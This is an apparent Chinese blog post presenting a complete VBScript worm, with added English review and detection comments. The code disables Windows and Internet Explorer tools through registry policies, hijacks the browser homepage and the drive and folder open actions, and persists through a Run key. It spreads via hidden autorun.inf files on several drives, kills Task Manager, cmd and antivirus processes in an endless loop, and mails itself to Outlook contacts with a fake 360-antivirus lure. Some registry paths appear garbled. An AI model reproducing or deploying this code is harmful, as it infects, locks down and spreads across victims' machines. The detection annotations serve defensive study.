Vbs 测试程序一

转载请注明出处

 有点小恶意哦!慎重测试

'Author's header (SeChaos): states the script is for entertainment only, not for malicious distribution, cracking or rewriting, and that the author accepts no liability and reserves final interpretation.
'NOTE(review): regardless of the header, the rest of the script writes policy and autostart values to the registry, copies itself to drive roots, terminates processes and sends itself by mail.
'ws and pp are used by the process-query loop; fsoFolder is declared but not referenced anywhere in the visible script.
dim fso,wsh,myfile,ws,pp,fsoFolder 
'WScript.Shell: used for every RegWrite call and for the cmd /c invocations via Run.
set wsh=wscript.createobject("wscript.shell") 
'FileSystemObject: used for the existence checks, the self-copy and the creation of the batch launcher.
set fso=wscript.createobject("scripting.filesystemobject") 
'File object for the currently running script itself (ScriptFullName); it is the source of the self-copy.
set myfile=fso.GetFile(wscript.scriptfullname) 
'Registry changes: Explorer and Internet Explorer policy values, browser start/search pages, and an autostart entry.
'NOTE(review): key paths are kept exactly as they appear on the page, where no path separators are visible.
'Detection: a script host (wscript.exe / cscript.exe) writing a burst of values under Policies and Run keys is a strong indicator for this block.
'CheckedValue for the SHOWALL folder option is set to 0 - presumably so that choosing "show hidden files" no longer reveals the hidden copies; confirm.
wsh.Regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"
'Internet Explorer "Restrictions" and "Control Panel" policy values set to 1. Judging by their names they remove the context menu, Internet Options, Save As, File > Open and several settings pages, which keeps the user from undoing the page changes made below.
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD"
'Browser hijack: start page, search page and their default URLs are pointed at the author's blog, for the current user and for the .DEFAULT profile. No type is passed, so RegWrite stores these as strings (REG_SZ is its default).
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainSearch Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainDefault_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainDefault_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainDefault_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainDefault_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainSearch Page","http://www.cnblogs.com/Chaobs/"
'The HomePage policy value is written a second time here (same key and data as earlier in this block), followed by further IE lock-down values.
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD"
'Explorer / WinOldApp policy values for the current user.
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD"
'Persistence: a machine-wide Run value named Win32system is pointed at the script copy on C:, so the script is started again at logon. A Run value named ScanRegistry is set to an empty string.
'Detection: alert on Run-key values whose data is a .vbs file at a drive root.
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","c:NYboy.vbs" 
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry",""
'Explorer policy values set to 1. By their names they remove Log Off, Run, the desktop, context menus, Shut Down, Help, Windows-key shortcuts, Find, Windows Update, taskbar settings, Favorites and recent-document lists, i.e. the tools a user would reach for to investigate or recover.
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerStartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsMenu",1,"REG_DWORD"
'NoFind (and DisableRegistryTools below) pass the data as the string "1" rather than the number 1 used elsewhere.
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind","1","REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsHistory",1,"REG_DWORD"
'DisableRegistryTools blocks the registry editor for the user, which hinders manual clean-up; a write to this value by a script host is worth alerting on by itself.
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD"
'Shell-verb hijack for drives and folders: the default verb of the Drive and Directory classes is set to "auto", and the "auto" command is set to the batch launcher with the clicked path as its argument.
'Effect: double-clicking a drive or folder in Explorer starts the batch file instead of opening the location.
'Detection: any change to the shell default verb or a new shell command under the Drive or Directory class, in HKCR or under HKLM Classes, is unusual on a healthy system.
wsh.Regwrite "HKLMSOFTWAREClassesDriveshellautocommand","C:NYboy.bat '%1'" 
wsh.Regwrite "HKCRDriveshell","auto"
wsh.Regwrite "HKCRDriveshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKLMSOFTWAREClassesDirectoryshell","auto"
wsh.Regwrite "HKCRDirectoryshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKLMSOFTWAREClassesDirectoryshellautocommand","C:NYboy.bat '%1'"
'File-class tampering: the DefaultIcon of several file classes is replaced with one icon file, in both HKCR and HKLM Classes.
'NOTE(review): the class names shown as " xtfile" and "atfile" look garbled by the page rendering; the neighbouring entries (exefile, dllfile, inifile) suggest other standard file classes were meant - confirm against an original copy.
wsh.Regwrite "HKCRexefileDefaultIcon","c:1.ico" 
wsh.Regwrite "HKCR xtfileDefaultIcon","c:1.ico" 
wsh.Regwrite "HKCRdllfileDefaultIcon","c:1.ico" 
wsh.Regwrite "HKCRatfileDefaultIcon","c:1.ico" 
wsh.Regwrite "HKCRinifileDefaultIcon","c:1.ico" 
wsh.Regwrite "HKLMSOFTWAREClassesexefileDefaultIcon","c:1.ico" 
wsh.Regwrite "HKLMSOFTWAREClasses xtfileDefaultIcon","c:1.ico" 
wsh.Regwrite "HKLMSOFTWAREClassesdllfileDefaultIcon","c:1.ico" 
wsh.Regwrite "HKLMSOFTWAREClassesatfileDefaultIcon","c:1.ico" 
wsh.Regwrite "HKLMSOFTWAREClassesinifileDefaultIcon","c:1.ico" 
'The .reg extension is re-associated with the txtfile class - presumably so that double-clicking a .reg file opens it as text instead of importing it, which would get in the way of a registry restore; confirm.
wsh.Regwrite "HKLMSoftwareCLASSES.reg","txtfile"
'Logon notice: LegalNoticeCaption / LegalNoticeText under Winlogon are shown to the user before logon.
'Caption (translated): "Hello, Chaobs is playing a little joke on you". Text (translated): "You have been infected, run an antivirus quickly or contact QQ5788*****".
'Detection: these two values are rarely changed outside of Group Policy; a write from a script host is a useful indicator.
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","你好啊,Chaobs和你开个小小的玩笑"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","你已经中毒了,赶快杀毒或者与QQ5788*****联系"
'Self-replication: the running script is copied to the C:, D:, E:, F: and I: drives.
'("U disk" in the original comment is the usual Chinese term for a USB flash drive; the drive letter actually used in the code is I:.)
'Detection: a script host writing a .vbs file to several volume roots in quick succession.
myfile.copy "c:" 
myfile.copy "D:" 
myfile.copy "E:"
myfile.copy "F:" 
myfile.copy "I:" 
'34 = 2 (Hidden) + 32 (Archive): the file the script was started from is marked hidden.
myfile.attributes=34 
'AutoRun propagation, repeated with the same pattern for C:, D:, E:, F: and I:.
'For each drive: if an autorun.inf already exists it is only fetched with GetFile (objFolder is not used again in the visible script) and nothing is written.
'Otherwise cmd.exe appends an [AutoRun] section whose open=, shellexecute= and shell entries all name the batch launcher, marks autorun.inf hidden + system + read-only, and a NYboy.bat containing the single line "NYboy.vbs" is created on that drive.
'Mitigation: Windows 7 and later do not honour the launch entries of autorun.inf on USB flash media, and the NoDriveTypeAutoRun policy can disable AutoRun per drive type.
'Detection: creation of a hidden/system autorun.inf together with a .bat at a volume root, and cmd.exe spawned by wscript.exe with "attrib +h +s +r" on its command line.
If fso.FileExists("C:autorun.inf") Then 
Set objFolder = fso.GetFile("C:autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>C:autorun.inf"_ 
&"&& echo open=NYboy.bat >>C:autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>C:autorun.inf"_ 
&"&& echo shellAutocommand=NYboy.bat>>C:autorun.inf"_ 
&"&& echo shell=Auto>>C:autorun.inf"_ 
&"&& attrib +h +s +r C:autorun.inf" 
'Batch launcher for C: - its only content is the script's file name.
set autobatc=fso.createtextfile("c:NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
'Same steps for D:.
If fso.FileExists("D:autorun.inf") Then 
Set objFolder = fso.GetFile("D:autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>D:autorun.inf"_ 
&"&& echo open=NYboy.bat >>D:autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>D:autorun.inf"_ 
&"&& echo shellAutocommand=NYboy.bat>>D:autorun.inf"_ 
&"&& echo shell=Auto>>D:autorun.inf"_ 
&"&& attrib +h +s +r D:autorun.inf" 
set autobatd=fso.createtextfile("D:NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
'Same steps for E:.
If fso.FileExists("E:autorun.inf") Then 
Set objFolder = fso.GetFile("E:autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>E:autorun.inf"_ 
&"&& echo open=NYboy.bat >>E:autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>E:autorun.inf"_ 
&"&& echo shellAutocommand=NYboy.bat>>E:autorun.inf"_ 
&"&& echo shell=Auto>>E:autorun.inf"_ 
&"&& attrib +h +s +r E:autorun.inf" 
set autobate=fso.createtextfile("E:NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
'Same steps for F:.
If fso.FileExists("F:autorun.inf") Then 
Set objFolder = fso.GetFile("F:autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>F:autorun.inf"_ 
&"&& echo open=NYboy.bat >>F:autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>F:autorun.inf"_ 
&"&& echo shellAutocommand=NYboy.bat>>F:autorun.inf"_ 
&"&& echo shell=Auto>>F:autorun.inf"_ 
&"&& attrib +h +s +r F:autorun.inf" 
set autobatf=fso.createtextfile("F:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'Same steps for I: (the variable name autobatf is reused from the F: branch).
If fso.FileExists("I:autorun.inf") Then 
Set objFolder = fso.GetFile("I:autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>I:autorun.inf"_ 
&"&& echo open=NYboy.bat >>I:autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>I:autorun.inf"_ 
&"&& echo shellAutocommand=NYboy.bat>>I:autorun.inf"_ 
&"&& echo shell=Auto>>I:autorun.inf"_ 
&"&& attrib +h +s +r I:autorun.inf" 
set autobatf=fso.createtextfile("I:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'Concealment: one cmd.exe invocation marks the batch launcher on each of the five drives hidden + system + read-only, so it does not appear in a default Explorer view.
'The commands are chained with &&, so a failing attrib stops the rest of the chain.
'Detection: list volume roots with hidden and system files shown (for example "dir /a") and look for NYboy.bat next to autorun.inf.
wsh.run "cmd /c attrib +h +s +r C:NYboy.bat"_ 
&"&& attrib +h +s +r D:NYboy.bat"_ 
&"&& attrib +h +s +r E:NYboy.bat"_ 
&"&& attrib +h +s +r F:NYboy.bat"_ 
&"&& attrib +h +s +r I:NYboy.bat"
'Process killing: in a loop with no exit condition, WMI is queried for a fixed list of process names and every match is terminated, with a 100 ms pause after each termination.
'Targets: taskmgr.exe, QQ.exe, notepad.exe, IEXPLORE.exe, cmd.exe, avp.exe, winRAR.exe, realplay.exe, WINWORD.exe.
'("carbachol" in the original comment is presumably a mistranslation of Kaspersky, whose process is avp.exe.)
'Killing Task Manager, the command prompt and an antivirus process removes the usual means of stopping the script.
'NOTE(review): the WMI moniker string below looks garbled by the page rendering.
'Detection: a long-running wscript.exe issuing repeated Win32_Process queries and Terminate calls; Task Manager or security tools closing right after launch.
do 
set ws=getobject("winmgmts:\. ootcimv2") 
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'") 
for each i in pp 
i.terminate()
wscript.sleep 100 
next 
loop
'Mail propagation through Outlook automation: for entries 1 to 5 of the first MAPI address list, a mail item is created, the script copy on C: is attached and the message is sent.
'The lure impersonates the antivirus vendor 360. Subject (translated): "360 virus test". Body (translated): "Dear user: to serve users better and strengthen 360's virus protection, this patch is being issued; details are on the official website. Please follow the attachment for the test; you may need to close or block the old version of 360 so that it can upgrade online. Thank you - 360 R&D Center".
'The body therefore asks the recipient to switch off their existing protection before opening the attachment.
'Mitigation: Outlook blocks .vbs as a Level 1 attachment type and guards programmatic sending through its object-model security settings; mail gateways should strip script attachments.
'Detection: wscript.exe instantiating Outlook.Application, and outbound mail carrying a .vbs attachment.
Set ol=CreateObject("Outlook.Application")
'From here on runtime errors are ignored, so a failed address lookup, attach or send does not stop the loop.
On Error Resume Next
For x=1 To 5
'CreateItem(0) creates a mail item (olMailItem).
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="360病毒测试"
Mail.Body="尊敬的用户您好:为了更好的服务用户,加强360病毒防范能力,特发此补丁,详细可在官网查询。具体测试请按随信附件进行,您可能需要关闭或阻止旧版360运行以便在线升级。谢谢合作               360研发中心"
Mail.Attachments.Add("c:NYboy.vbs")
Mail.Send
Next
ol.Quit

 
不要想你能为世界做什么,想想你该为世界做什么!
原文地址:https://www.cnblogs.com/Chaobs/p/3837524.html